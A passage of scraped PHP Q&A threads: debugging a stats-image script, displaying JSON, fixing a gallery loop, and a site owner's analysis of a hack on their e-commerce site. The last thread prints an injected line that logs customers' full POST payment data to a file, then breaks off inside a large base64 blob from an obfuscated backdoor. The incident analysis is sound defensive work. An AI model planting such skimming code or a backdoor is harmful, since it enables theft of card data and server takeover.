Unable to get stat gathering to work - php
Using PHP to gather stats from multiple files. Goal is to take the entire first row of data, which is the column name, then take the entire row of data from the row where the first column matches the name specified in the code. These two rows should then be linked to each other, so they can be displayed in a dynamic image.
However, to avoid excessive requests from the external data source, the data is only downloaded once a day by saving it into a json file. The previous day's data is also kept, to perform a difference calculation.
What I'm stuck on is...well, it's not working as intended. The dynamic image does not display and says it cannot be displayed because it contains errors, and the files aren't being created properly. Without any files existing, only the 'old' data file is being created, and the gathered data is saved there in a format that I didn't expect.
Here's the entire PHP code:
<?php
header("Content-Type:image/png");
$root=realpath($_SERVER['DOCUMENT_ROOT']);
function saveTeamData(){
$urls=array('http://www.dc-vault.com/stats/bio.txt','http://www.dc-vault.com/stats/math.txt','http://www.dc-vault.com/stats/misc.txt','http://www.dc-vault.com/stats/overall.txt','http://www.dc-vault.com/stats/phys.txt');
$fullJson=array();
function stats($url){
$json=array();
$team=array("teamName");
$file=fopen($url,'r');
$firstRow=fgetcsv($file,0,"\t");
while($data=fgetcsv($file,0,"\t")){
if(in_array($data[0],$team)){
foreach($firstRow as $indx=>$colName){
if((strpos($colName,'Position')!=0)||(strpos($colName,'Score')!=0)||(strpos($colName,'Team')!=0)){
if(strrpos($colName,'Position')!==false){
$colName=substr($colName,0,strpos($colName,' Position'));
$colName=$colName."Pos";
}else{
$colName=substr($colName,0,strpos($colName,' Score'));
$colName=$colName."Score";
}
$colName=str_replace(' ',',',$colName);
$teamData[$colName]=$data[$indx];
}
}
$json=$teamData;
}
}
fclose($file);
return $json;
}
foreach($urls as $item){
$fullJson=array_merge($fullJson,stats($item));
}
$final_json['teamName']=$fullJson;
$final_json['date']=date("Y-m-d G:i:s",strtotime("11:00"));
$final_json=json_encode($final_json);
file_put_contents("$root/scripts/vaultData.js",$final_json);
return $final_json;
}
if(!file_exists("$root/scripts/vaultData.js")){
$teamData=saveTeamData();
}else{
$teamData=json_decode(file_get_contents("$root/scripts/vaultData.js"));
}
$lastDate=$teamData->date;
$now=date("Y-m-d G:i:s");
$hours=(strtotime($now)-strtotime($lastDate))/3600;
if($hours>=24||!file_exists("$root/scripts/vaultDataOld.js")){
file_put_contents("$root/scripts/vaultDataOld.js",json_encode($teamData));
$teamData=saveTeamData();
}
$team=$teamData->{"teamName"};
$teamOld=json_decode(file_get_contents("$root/scripts/vaultDataOld.js"))->{"teamName"};
$template=imagecreatefrompng("$root/images/vaultInfo.png");
$black=imagecolorallocate($template,0,0,0);
$font='images/fonts/UbuntuMono-R.ttf';
$projects=array();
$subsections=array();
foreach($team as $key=>$val){
$projectName=preg_match("/^(.*)(?:Pos|Score)$/",$key,$cap);
$projectName=str_replace(","," ",$cap[1]);
if(preg_match("/Pos/",$key)){
$$key=(strlen($val)>10?substr($val,0,10):$val);
$delta=$key."Delta";
$$delta=($val - $teamOld->{$key});
$$delta=(strlen($$delta)>5?substr($$delta,0,5):$$delta);
if($projectName!=="Overall"){
if(!in_array($projectName,array("Physical Science","Bio/Med Science","Mathematics","Miscellaneous"))){
$projects[$projectName]["position"]=$$key;
$projects[$projectName]["position delta"]=$$delta*1;
}else{
$subsections[$projectName]["position"]=$$key;
$subsections[$projectName]["position delta"]=$$delta*1;
}
}
}elseif(preg_match("/Score/",$key)){
$$key=(strlen($val)>10?substr($val,0,10):$val);
$delta=$key."Delta";
$$delta=($val - $teamOld->{$key});
$$delta=(strlen($$delta)>9?substr($$delta,0,9):$$delta);
if($projectName!=="Overall"){
if(!in_array($projectName,array("Physical Science","Bio/Med Science","Mathematics","Miscellaneous"))){
$projects[$projectName]["score"]=$$key;
$projects[$projectName]["score delta"]=$$delta;
}else{
$subsections[$projectName]["score"]=$$key;
$subsections[$projectName]["score delta"]=$$delta;
}
}
}
}
$sort=array();
foreach($projects as $key=>$row){
$sort[$key]=$row["score"];
}
array_multisort($sort,SORT_DESC,$projects);
$lastupdated=round($hours,2).' hours ago';
$y=35;
foreach($projects as $name=>$project){
imagettftext($template,10,0,5,$y,$black,$font,$name);
imagettftext($template,10,0,149,$y,$black,$font,$project['position']);
imagettftext($template,10,0,216,$y,$black,$font,$project['position delta']*-1);
imagettftext($template,10,0,257,$y,$black,$font,$project['score']);
imagettftext($template,10,0,331,$y,$black,$font,$project['score delta']);
$y+=20;
}
$y=655;
foreach($subsections as $name=>$subsection){
imagettftext($template,10,0,5,$y,$black,$font,$name);
imagettftext($template,10,0,149,$y,$black,$font,$subsection['position']);
imagettftext($template,10,0,216,$y,$black,$font,$subsection['position delta']*-1);
imagettftext($template,10,0,257,$y,$black,$font,$subsection['score']);
imagettftext($template,10,0,331,$y,$black,$font,$subsection['score delta']);
$y+=20;
}
imagettftext($template,10,0,149,735,$black,$font,$team->{'OverallPos'});
imagettftext($template,10,0,216,735,$black,$font,$OverallPosDelta*-1);
imagettftext($template,10,0,257,735,$black,$font,$OverallScore);
imagettftext($template,10,0,331,735,$black,$font,$OverallScoreDelta);
imagettftext($template,10,0,149,755,$black,$font,$lastupdated);
imagepng($template);
?>
And here is what the data looks like when it is saved:
"{\"teamName\":{\"Folding#HomePos\":\"51\",\"Folding#HomeScore\":\"9994.405407\"},\"date\":\"2014-03-14 11:00:00\"}"
I've omitted most of the data because it just makes things excessively long, and it helps to see the format. Now the reason why its an unexpected output is because I didn't expect trailing slashes to be in it. The older version of this code would output like this:
{"teamName":{"Asteroids#HomePos":"192","Asteroids#HomeScore":"7647.783251"},"date":"2014-03-14 11:00:00"}
So the expected behaviour is to to gather the data from the aforementioned rows in each tab delimited text file, copy the old data into the 'old' data file (vaultDataold), save the new data into the 'current' data file (vaultData), and then display the data from the 'current' file in a dynamic image, along with performing a 'new' minus 'old' calculation on the two files to show the change since the previous day.
Most of this code should work, as I've had it working before in a different way. The issue likely lies somewhere with gathering the row data and saving it, most probably the latter. I'm guessing the slashes are causing the issue.
Turns out that the cause was twofold. Firstly, in my function, I was JSON encoding something that had already been encoded, so when the second file was saved, it appeared as shown in my question. To fix that, I did this:
$final_json['date']=date("Y-m-d G:i:s",strtotime("11:00"));
$encode_json=json_encode($final_json);
file_put_contents("$root/scripts/vaultData.js",$encode_json);
return $final_json;
In addition, as pointed out by another in the comments, I had to add $root to my function, and again within it.
Related
Output json to php (frontend)
Here is the output as its beeing displayed right now in my index file (on the wesbite)
So this is what i have right now
https://gyazo.com/e3b5efb2c0ac9c7225c5c322ae92b0e9
And i want to have that displayed more nicley ( perhaps in a table with header from and then text )
That is my problem, im usure of what i can google or search for. Get the data that is saved in my json file. And Display it nicley in my index.
Get some of the values from my .json file and display them in my index.
Here is my php code.
$outfile= 'result.json';
$url='https://newsapi.org/v2/top-headlines?country=us&category=business&apiKey=MYAPIKEY';
$json = file_get_contents($url);
if($json) {
if(file_put_contents($outfile, $json, FILE_APPEND)) {
echo "Saved JSON fetched from “{$url}” as “{$outfile}”.";
}
else {
echo "Unable to save JSON to “{$outfile}”.";
}
}
else {
echo "Unable to fetch JSON from “{$url}”.";
}
$option = $_GET['option'];
And here its how i's getting displayed in my .json file.
{"status":"ok","totalResults":20,"articles":[{"source":{"id":"cnn","name":"CNN"},"author":"Matt McFarland","title":"Has Elon Musk lost control of his hype machine?","description":"For years, the entrepreneur controlled public opinion of Tesla. That's changing.","url":"https://money.cnn.com/2018/07/26/technology/elon-musk-tesla/index.html",
You might have invalid json response. verify first whether do you have valid json. May be copy your response and check it in some validator website like www.jsonlnt.com if json is fine then PHP function json_decode($you_json_string_php_variable); will work fine.
PHP for loop nested issue - random broke everything
I can't find the issue with my code... There's two for loop for building a layout that randomly wraps together the images (from 1 to 3 photos inside a wrapper div)
Sometimes it goes well, but sometimes it gives me the error: call method to null (like the object array can't access the property).
here is the code:
if (isset($get_medias)){
//new gallery structure
$output_gallery_main.='<div id="g-fotografica" class="metro_gallery flip vertical lightbox">';
$indice=0;$loop_counter=0;
for($indice;$indice<count($get_medias);$indice++){
$rand_n=rand(0,2);
if($loop_counter==0) {
$item_size="2x2";
} else { $item_size="1x1"; }
$output_gallery_main.='<div class="tile tile_'.$item_size.' '.$loop_counter.' white">';
for($a=0;$a<=$rand_n;$a++){
$nuovo_indice=$indice+$a;
$m_media=$get_medias[$nuovo_indice];
$titolo=$m_media->get_titolo();
$alt=$m_media->get_alt();
$src=$m_media->get_src();
$thumb_src=$m_media->get_thumb();
$stato=$m_media->get_stato() == 1 ? 'visibile' : 'nascosto';
$ordine=$m_media->get_ordinamento_modello($modello);
if($stato=="visibile"){
//build the structure
$output_gallery_main.='<img src="http://'.$thumb_src.'" alt="'.$alt.'" title="'.$alt.'" data-preview="http://'.$src.'" data-caption="'.$titolo.'" />';
}
}
$output_gallery_main.='</div>';
$indice=$nuovo_indice;
$loop_counter++;
}
$output_gallery_main.='</div>';
Please help me....I'm going crazy!
ps. The $get_media is an array retreived from a db, I printed out the array and it's alway well formed.
Deobfuscating Malicious Code: What's the purpose of this code?
So this week our small business ecommerce site got hacked. We noticed that the files on the live server were out of sync with our svn repo. Two files having to do with verifying card numbers had this at the end:
#file_put_contents("/home/*****/public_html/errors/error_log.txt", "{$_SERVER["REMOTE_ADDR"]}, {$_SERVER["REQUEST_URI"]}:\n" . print_r($_POST, 1), FILE_APPEND);
It writes the current request to an error_log.txt file. This code runs when the user hits 'confirm purchase', so the request has the full payment info in it. Obviously, this is not good.
We reverted the files and started investigating. The file this line was in was a *.inc file, and not publicly visible. The attacker must have already had access to our file system to read our code, know that that particular file was called during checkout, and insert the line in the correct place.
Today I found another file tucked away in a rarely touched corner of the site. log.php seems to present an interface for remote code execution. It was heavily obfuscated. Here is my attempt at deobfuscating it. Scroll past the massive block of base64 encoded mystery code to see my comments.
<?php
$data=base64_decode(str_replace("\n", '', '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
